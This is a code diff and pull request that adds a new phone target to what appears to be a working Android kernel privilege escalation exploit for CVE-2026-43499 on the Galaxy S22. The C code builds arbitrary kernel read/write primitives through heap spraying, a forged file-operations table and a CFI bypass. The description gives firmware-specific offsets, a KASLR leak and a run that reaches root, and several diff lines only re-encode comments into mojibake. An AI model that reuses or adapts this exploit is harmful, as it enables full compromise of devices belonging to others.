+    if (prepare_ctx.childs[i] > 0) {
+      kill_child(prepare_ctx.childs[i]);
+      prepare_ctx.childs[i] = -1;
+    }
+  }
+
+  return base;
+}
+
+uintptr_t prepare_good_kernel_page(int payload_mode) {
+  int max_attempts = KERNEL_PAGE_SETUP_ATTEMPTS;
+  if (payload_mode == PAGE_PAYLOAD_SLIDE) {
+    max_attempts = SLIDE_KERNEL_PAGE_SETUP_ATTEMPTS;
+  } else if (payload_mode == PAGE_PAYLOAD_FOPS ||
+             payload_mode == PAGE_PAYLOAD_exp64) {
+    max_attempts = FOPS_KERNEL_PAGE_SETUP_ATTEMPTS;
+  }
+  for (int attempt = 1; attempt <= max_attempts; attempt++) {
+    uintptr_t base = prepare_kernel_page(payload_mode);
+    if (base) {
+      return base;
+    }
+    pr_warning("prepare_kernel_page retry %d/%d\n", attempt,
+               max_attempts);
+  }
+  pr_warning("prepare_kernel_page did not find usable nonzero source pointers\n");
+  return 0;
+}
+
+ssize_t configfs_write_once(int fd, uintptr_t target, const void *data, size_t len) {
+  unsigned char blob[128];
+  memset(blob, 0, sizeof(blob));
+  /* Keep bin_buffer's low 24 bits zero: the multi-pass SET_NAME writes the
+   * blob via strscpy(), which copies word-at-a-time and zero-masks every
+   * byte to the word end after each NUL (blob zero position).  Passes for
+   * blob zeros at [69..73] (needs_read_fill/read_in_progress) therefore
+   * wipe dest[74..79] = bin_buffer's low bytes.  With an aligned pointer
+   * those bytes are already 0, the wipe is a no-op, and the real offset
+   * rides in *ppos. */
+  off_t pos = (off_t)(target & 0xffffffULL);
+  uintptr_t aligned = target - (uintptr_t)pos;
+  put64(blob, CFG_BIN_BUFFER_OFF - ASHMEM_NAME_PREFIX_LEN, aligned);
+  put32(blob, CFG_BIN_BUFFER_SIZE_OFF - ASHMEM_NAME_PREFIX_LEN,
+        (uint32_t)((uint64_t)pos + len));
+  put32(blob, CFG_CB_MAX_SIZE_OFF - ASHMEM_NAME_PREFIX_LEN, 0);
+  errno = 0;
+  int set_ret = try_set_ashmem_name_blob(fd, blob, sizeof(blob));
+  int set_errno = errno;
+  if (set_ret != 0) {
+    errno = set_errno;
+    return -1;
+  }
+
+  errno = 0;
+  ssize_t wr = pwrite(fd, data, len, pos);
+  return wr;
+}
+
+ssize_t configfs_read_once(int fd, uintptr_t target, void *data, size_t len) {
+  unsigned char blob[128];
+  memset(blob, 0, sizeof(blob));
+  /* Keep buffer->page's low 24 bits zero (see configfs_write_once): the
+   * strscpy word-mask from the blob zeros at [0..4] would otherwise wipe
+   * the page pointer's low bytes.  Aligned pointer + real offset in *ppos
+   * makes the wipe a no-op. */
+  off_t pos = (off_t)(target & 0xffffffULL);
+  uintptr_t page = target - (uintptr_t)pos;
+  put64(blob, CFG_PAGE_OFF - ASHMEM_NAME_PREFIX_LEN, page);
+  put32(blob, CFG_NEEDS_READ_FILL_OFF - ASHMEM_NAME_PREFIX_LEN, 0);
+  errno = 0;
+  int set_ret = try_set_ashmem_name_blob(fd, blob, sizeof(blob));
+  int set_errno = errno;
+  if (set_ret != 0) {
+    errno = set_errno;
+    return -1;
+  }
+
+  errno = 0;
+  ssize_t rd = pread(fd, data, len, pos);
+  return rd;
+}
+
+int is_direct_ptr(uintptr_t value) {
+  return value >= DIRECT_MAP_BASE && value < DIRECT_MAP_END;
+}
+
+int is_kernel_ptr(uintptr_t value) {
+  return value >= 0xffff800000000000ULL;
+}
+
+uint64_t kernel_read64(int fd, uintptr_t target) {
+  uint64_t value = 0;
+  ssize_t n = kernel_read_data(fd, target, &value, sizeof(value));
+  if (n != (ssize_t)sizeof(value)) {
+    return 0;
+  }
+  return value;
+}
+
+ssize_t kernel_write_data(int fd, uintptr_t target, const void *data, size_t len) {
+  return configfs_write_once(fd, target, data, len);
+}
+
+ssize_t kernel_read_data(int fd, uintptr_t target, void *data, size_t len) {
+  return configfs_read_once(fd, target, data, len);
+}

--- a/src/targets/S901USQU2BVK1/util.c
+++ b/src/targets/S901USQU2BVK1/util.c
@@ -1,4 +1,4 @@
-#include "common.h"
+﻿#include "common.h"
 #include "kernelsnitch/kernelsnitch.h"
 
 FILE *g_logfile = NULL;
@@ -334,6 +334,15 @@ int open_ashmem_device(void) {
   return SYSCHK(open(ashmem_path, O_RDWR | O_CLOEXEC));
 }
 
+int cve_temp_root_mode(void) {
+  static int mode = -1;
+  if (mode < 0) {
+    const char *env = getenv("CVE43499_TEMP_ROOT");
+    mode = (env && *env == '1') ? 1 : 0;
+  }
+  return mode;
+}
+
 uintptr_t p0_data_alias(uintptr_t image_addr) {
   uintptr_t off = image_addr - KIMAGE_TEXT_BASE;
   uintptr_t phys = P0_KERNEL_PHYS_LOAD + off;
@@ -377,7 +386,7 @@ void put32(unsigned char *p, size_t off, uint32_t value) {
 
 void put_fake_fops_table(unsigned char *p, size_t off) {
   /* CONFIG_CFI_CLANG: every function pointer in the table MUST be the
-   * canonical .cfi_jt jump-table entry — raw kallsyms addresses make the
+   * canonical .cfi_jt jump-table entry â€” raw kallsyms addresses make the
    * first indirect call (misc_open -> f_op->open) panic with
    * "CFI failure" (observed on the live target).  Layout mimics the real
    * ashmem_fops: owner NULL, .splice_read NULL, real ashmem_llseek.
@@ -539,7 +548,7 @@ int clone_memfd(void) {
  * test VM (root): a kprobe event fetches arbitrary kernel memory into the
  * trace buffer (offsets from _text are parsed with kstrtol, so direct-map
  * targets are reachable).  Everywhere else the verify is skipped and the
- * flow proceeds unverified — the upstream device behaviour, relying on
+ * flow proceeds unverified â€” the upstream device behaviour, relying on
  * reclaim determinism and the downstream cfi-stage checks.
  */
 
@@ -935,7 +944,7 @@ static void pre_leak_slab_flush(void) {
    * leaked mm_struct.  This way the leaked slab becomes fully empty
    * the instant memfd_leak closes; discard_slab fires on the same
    * put_cpu_partial -> unfreeze_partials path without an extra
-   * scheduling round-trip.  No usleep/yield here — we want zero gap
+   * scheduling round-trip.  No usleep/yield here â€” we want zero gap
    * between the close and the first skb-send that reclaims the page. */
   flush_mm_cpu_partial();
   release_prepare_drain_markers();
@@ -992,7 +1001,7 @@ int prepare_skb_payload(uintptr_t base, int payload_mode) {
      * comes from the stamped stale waiter's OWN tree_entry during the
      * chain walk's rt_mutex_dequeue(lock, waiter) (rtmutex.c step [7]):
      * rb_erase_cached sees pc=fake_fops(RED), rb_right=0, rb_left=target
-     * → rb_set_parent(child=target, parent=fake_fops) writes
+     * â†’ rb_set_parent(child=target, parent=fake_fops) writes
      * *target = fake_fops.  Collateral: __rb_change_child stores `target`
      * into fake_fops+0x08 (the "parent's" rb_right = fops .llseek slot),
      * repaired later by repair_fake_fops_llseek().  Hence the page only
@@ -1001,7 +1010,7 @@ int prepare_skb_payload(uintptr_t base, int payload_mode) {
     for (size_t chunk = 0; chunk < SKB_SEND_SIZE; chunk += ORDER3_SIZE) {
       unsigned char *p = skb_buf + chunk + SKB_FRAG_BIAS;
 
-      /* fake_lock: all zero — wait_lock free, no owner, empty tree
+      /* fake_lock: all zero â€” wait_lock free, no owner, empty tree
        * (memset above already zeroed it). */
 
       /* fake_task: detached (pi_waiters empty), sane prio/usage so the
@@ -1050,7 +1059,7 @@ int prepare_skb_payload(uintptr_t base, int payload_mode) {
 #endif
 
   /* FOPS mode: one-child rb_erase at pi_tree_entry writes fake_fops to
-   * ASHMEM_MISC_FOPS:  parent = ASHMEM_MISC_FOPS-8 → __rb_change_child()
+   * ASHMEM_MISC_FOPS:  parent = ASHMEM_MISC_FOPS-8 â†’ __rb_change_child()
    * stores the child (fake_fops) into parent->rb_right (= target).
    * color MUST be RED (0): a BLACK erased node would make __rb_erase_color
    * walk ashmem_misc/fake_fops as rb nodes (rotate/recolor garbage).
@@ -1059,14 +1068,14 @@ int prepare_skb_payload(uintptr_t base, int payload_mode) {
    *  - rb_left=fake_fops / rb_right=0: rb_erase takes the one-child path
    *    with child=fake_fops (the write value).  rb_next(fake_w0) then has
    *    rb_right==0 and walks UP to parent=ASHMEM_MISC_FOPS-8, returning it
-   *    as the new cached leftmost — it never descends into the fops table.
+   *    as the new cached leftmost â€” it never descends into the fops table.
    *  - fake_task->pi_waiters.rb_node stays NULL (detached root, see below),
    *    so the post-write rt_mutex_enqueue_pi(stale) inserts into an EMPTY
-   *    tree: parent==NULL → node colored BLACK → break.  Zero fixup
-   *    iterations, zero recolors/rotations touching the fops table —
+   *    tree: parent==NULL â†’ node colored BLACK â†’ break.  Zero fixup
+   *    iterations, zero recolors/rotations touching the fops table â€”
    *    .owner survives as fake_w0|1 and try_module_get() at open() passes
    *    (a fixup recolor to (fake_w0+0x18)|1 made module->state read the
-   *    pi_tree_entry self-pointer → ENODEV, observed on the live target). */
+   *    pi_tree_entry self-pointer â†’ ENODEV, observed on the live target). */
   uintptr_t write_pc = (data_addr(ASHMEM_MISC_FOPS) - 8); /* color=RED */
   uintptr_t write_right = 0;
   uintptr_t write_left = fake_fops;
@@ -1128,11 +1137,11 @@ int prepare_skb_payload(uintptr_t base, int payload_mode) {
        * points at the fake waiter.  rb_erase_cached() still runs rb_next +
        * rb_erase on it (node links are self-contained: parent = ASHMEM_MISC
        * _FOPS-8, rb_left = fake_fops), so the rb_write lands, but the tree
-       * itself stays EMPTY — the post-write rt_mutex_enqueue_pi() then
+       * itself stays EMPTY â€” the post-write rt_mutex_enqueue_pi() then
        * inserts the stale waiter as root with parent==NULL, i.e. ZERO
        * rb_insert_color fixup iterations that would otherwise recolor/
        * rotate the fake fops table (its .owner got clobbered to
-       * (fake_w0+0x18)|1 → try_module_get failure → ENODEV at open). */
+       * (fake_w0+0x18)|1 â†’ try_module_get failure â†’ ENODEV at open). */
       put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF, 0);
       put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF + 0x08,
             fake_w0 + FAKE_WAITER_PI_TREE_ENTRY_OFF);
@@ -1213,7 +1222,7 @@ uintptr_t prepare_kernel_page(int payload_mode) {
   }
   /* Kill the prepare children early too: their mm_structs must be
    * pinned solely by the memfds (refcount 1) so that closing a
-   * prepare memfd below actually frees the mm_struct — the v5.10
+   * prepare memfd below actually frees the mm_struct â€” the v5.10
    * cpu_partial drain before close(memfd_leak) depends on it. */
   for (size_t i = 0; i < prepare_ctx.mm_cnt; i++) {
     kill_child(prepare_ctx.childs[i]);
@@ -1357,7 +1366,7 @@ uintptr_t prepare_kernel_page(int payload_mode) {
    * partial list and discards it.  Draining BEFORE the close (the
    * earlier reorder) unfreezes the slab while it still holds its one
    * live object, so the slab is parked on the node partial list and the
-   * final free never discards — the page never reaches buddy
+   * final free never discards â€” the page never reaches buddy
    * (GDB-verified on b0q: zero discard_slab hits).
    * ---------------------------------------------------------------- */
   if (!oppo_teardown)
@@ -1385,7 +1394,7 @@ uintptr_t prepare_kernel_page(int payload_mode) {
 
   /* Step 1: close the leaked mm_struct.  The pre/post closes above left
    * the leak slab FROZEN on this CPU's SLUB cpu_partial list with
-   * inuse=1, so this last free takes the FREE_FROZEN path — the slab
+   * inuse=1, so this last free takes the FREE_FROZEN path â€” the slab
    * drops to inuse=0 but is NOT discarded (v5.10 never discards a
    * frozen slab from __slab_free). */
   SYSCHK(close(memfd_leak));
@@ -1409,11 +1418,11 @@ uintptr_t prepare_kernel_page(int payload_mode) {
    * unfreeze_partials AFTER the leak slab is empty.  The frozen+empty
    * leak slab then moves to the NODE partial list where
    * discard_slab() fires (inuse==0 && nr_partial >= min_partial(5))
-   * and its order-3 page lands on buddy free_area[3] — exactly the
+   * and its order-3 page lands on buddy free_area[3] â€” exactly the
    * upstream (S25U) ordering; the earlier drain-first reorder left the
    * leak slab stranded frozen+empty (GDB-verified: zero discard_slab
    * hits, page never reaches buddy).
-   * No mm_struct allocation may happen between step 1 and the sends —
+   * No mm_struct allocation may happen between step 1 and the sends â€”
    * a fresh mm alloc could reactivate the leak slab as cpu_slab. */
   if (!oppo_teardown) {
     for (size_t i = 0; i < prepare_ctx.mm_cnt; i += mm_objs_per_slab) {
@@ -1434,11 +1443,11 @@ uintptr_t prepare_kernel_page(int payload_mode) {
 
   /* Hold-all (default, IonStackQuest3 semantics): every reclaim skb stays
    * QUEUED on its pair through the cfi/pipe stages, so every order-3 page
-   * the sends captured — the leak page among them — keeps its payload until
+   * the sends captured â€” the leak page among them â€” keeps its payload until
    * close_reclaim_sockets() at the next prepare.  The old drain-cycling
    * (SKB_DRAIN_SENDS=1) freed each skb right after receipt and pinned only
    * one final head page; with b0q's tail-insert/shuffle buddy frees the
-   * leak page usually sat mid-list and was never captured — the payload
+   * leak page usually sat mid-list and was never captured â€” the payload
    * never landed, the page was recycled as live mm_structs by the exp64
    * child's own fork/exec churn, and the stale misc.fops then crashed
    * misc_open (GDB-verified 2026-08-07: 10/10 attempts missed, die at
@@ -1486,7 +1495,7 @@ uintptr_t prepare_kernel_page(int payload_mode) {
     }
   } else {
     /* Hold-all: queue each skb undrained.  Round-robin over the pairs;
-     * a full pair reports EAGAIN (MSG_DONTWAIT) — the pairs fill evenly,
+     * a full pair reports EAGAIN (MSG_DONTWAIT) â€” the pairs fill evenly,
      * so the first failure means every pair is at capacity. */
     for (int i = 0; i < reclaim_want; i++) {
       int pair = i % SKB_RECLAIM_PAIRS;
@@ -1502,7 +1511,7 @@ uintptr_t prepare_kernel_page(int payload_mode) {
   /* Stability hold (drain-cycling mode only): leave one payload skb queued
    * (undrained) so the reclaimed page_base stays allocated through the
    * pselect/cfi/pipe stages.  Without this the page floats in the buddy
-   * allocator and the pipe prepare child's sprays reclaim it — clobbering
+   * allocator and the pipe prepare child's sprays reclaim it â€” clobbering
    * the fake fops table (arb-r/w then reads 0, or CFI panics on close).
    * The send re-sprays the same payload, so page_base keeps valid contents.
    * Hold-all mode needs no separate hold: every queued skb is a hold. */
@@ -1652,3 +1661,4 @@ ssize_t kernel_write_data(int fd, uintptr_t target, const void *data, size_t len
 ssize_t kernel_read_data(int fd, uintptr_t target, void *data, size_t len) {
   return configfs_read_once(fd, target, data, len);
 }
+

--- a/src/targets/S901USQU2BVK1/utils.h
+++ b/src/targets/S901USQU2BVK1/utils.h
@@ -1,0 +1,84 @@
+#pragma once
+
+/*
+ * Target-specific utils for S901WVLS4DWL3.
+ * Includes the base kernelsnitch utils then extends the print macros
+ * with logfile output.  All static inline functions come from the base
+ * header — no redefinitions needed.
+ */
+#include "kernelsnitch/utils.h"
+
+#include <stdio.h>
+
+extern FILE *g_logfile;
+
+static inline void open_log(void) {
+    g_logfile = fopen("/sdcard/cve-2026-43499.log", "a");
+    if (g_logfile) {
+        fprintf(g_logfile, "\n=== START ===\n");
+        fflush(g_logfile);
+    }
+}
+
+/*
+ * Redefine the print macros to also write to g_logfile.
+ * #undef first to suppress redefinition warnings.
+ * ANDROID_APP_NO_LKM paths are left as-is (no logfile in app context).
+ */
+#ifndef ANDROID_APP_NO_LKM
+
+#undef pr_error
+#ifdef DEBUG
+#define pr_error(fmt, ...) do { \
+        printf(COLOR_RED "[!] %s:%d " COLOR_DEFAULT fmt, __FILE__, __LINE__, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[!] %s:%d " fmt, __FILE__, __LINE__, ##__VA_ARGS__); fflush(g_logfile); } \
+        exit(-1); \
+    } while (0)
+#else
+#define pr_error(fmt, ...) do { \
+        printf(COLOR_RED "[!] " COLOR_DEFAULT fmt, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[!] " fmt, ##__VA_ARGS__); fflush(g_logfile); } \
+        exit(-1); \
+    } while (0)
+#endif
+
+#undef pr_warning
+#ifdef DEBUG
+#define pr_warning(fmt, ...) do { \
+        printf(COLOR_RED "[-] %s:%d " COLOR_DEFAULT fmt, __FILE__, __LINE__, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[-] %s:%d " fmt, __FILE__, __LINE__, ##__VA_ARGS__); fflush(g_logfile); } \
+    } while (0)
+#else
+#define pr_warning(fmt, ...) do { \
+        printf(COLOR_RED "[-] " COLOR_DEFAULT fmt, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[-] " fmt, ##__VA_ARGS__); fflush(g_logfile); } \
+    } while (0)
+#endif
+
+#undef pr_info
+#ifdef DEBUG
+#define pr_info(fmt, ...) do { \
+        printf(COLOR_YELLOW "[*] %s:%d " COLOR_DEFAULT fmt, __FILE__, __LINE__, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[*] %s:%d " fmt, __FILE__, __LINE__, ##__VA_ARGS__); fflush(g_logfile); } \
+    } while (0)
+#else
+#define pr_info(fmt, ...) do { \
+        printf(COLOR_YELLOW "[*] " COLOR_DEFAULT fmt, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[*] " fmt, ##__VA_ARGS__); fflush(g_logfile); } \
+    } while (0)
+#endif
+
+#undef pr_success
+#ifdef DEBUG
+#define pr_success(fmt, ...) do { \
+        printf(COLOR_GREEN "[+] %s:%d " COLOR_DEFAULT fmt, __FILE__, __LINE__, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[+] %s:%d " fmt, __FILE__, __LINE__, ##__VA_ARGS__); fflush(g_logfile); } \
+    } while (0)
+#else
+#define pr_success(fmt, ...) do { \
+        printf(COLOR_GREEN "[+] " COLOR_DEFAULT fmt, ##__VA_ARGS__); \
+        if (g_logfile) { fprintf(g_logfile, "[+] " fmt, ##__VA_ARGS__); fflush(g_logfile); } \
+    } while (0)
+#endif
+
+#endif /* !ANDROID_APP_NO_LKM */


### PR DESCRIPTION
## What

Adds a new target `S901USQU2BVK1` (Galaxy S22 SM-S901U, Android 13, kernel
`5.10.81-android12-9`, bootloader locked) and one small root.c improvement.

## Target specifics (all proven on the real device)

- `__arm64_compat_sys_setsockopt` is an ENOSYS stub (disassembled from stock
  vmlinux) => the exp64 route is required; compat stamping is structurally dead.
- Stamp geometry derived from this firmware's disassembly:
  - futex chain: `__arm64_sys_futex` 0x70 + `do_futex` 0x20;
    `futex_wait_requeue_pi` frame 0x1a0 with `x27=sp+0x90`
    => rt_waiter at `top-0x1a0`
  - setsockopt chain: `0x10+0x70+0x10+0x40 = 0xd0`;
    `do_ipv6_setsockopt` frame `0x2d0` (`stp -0x60!` + `sub 0x270`),
    native group_source_req at `sp+0x150` (memset/copy_from_user of 0x108)
    => gr at `top-0x250`
  - **STAMP_OFF = 0xb0** (fit: 0xb0+0x50 <= 0x108)
- All symbol offsets extracted from the stock vmlinux symtab
  (ashmem/configfs/slide/UMH family); structural offsets inherited from the
  S901WVLS4DWL3 v5.10 port.
- KASLR via tracefs event 84 caller leak works in shell context;
  `SLIDE_TRACEFS_WORKER_CALLER_OFF=0x1185f8` votes unanimously every boot.

## root.c: CVE43499_ROOT_HELPER + temp-root opt-in

The Root My Galaxy app stages the umh helper binary at an app-controlled path
and passes it via `CVE43499_ROOT_HELPER`. The payload now prefers that path,
falling back to the compiled-in `ROOT_UMH_PATH` for plain adb use.

Second commit adds an opt-in **temp-root mode** (`CVE43499_TEMP_ROOT=1`): the
umh root queue is driven through the CFI-stage configfs primitive and the
pipe/physrw stage is skipped entirely. Rationale: on this unit the physrw
stage is the dominant kernel-panic source and is only required for KernelSU
late-load, which BVK1 cannot use anyway (missing symbol exports — see
below). Default remains the classic pipeline.

## Verification

SM-S901U on S901USQU2BVK1, locked bootloader:

```
$ EXPLOIT_ATTEMPTS=16 CVE43499_ROOT_HELPER=/data/local/tmp/cve-2026-43499-root \
    LD_PRELOAD=/data/local/tmp/cve-2026-43499-app.so /system/bin/sh -c true
[+] exploit completed attempt=1/16
[+] pipe physrw uid=2000->0
$ /data/local/tmp/cve-2026-43499-root -c id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
```
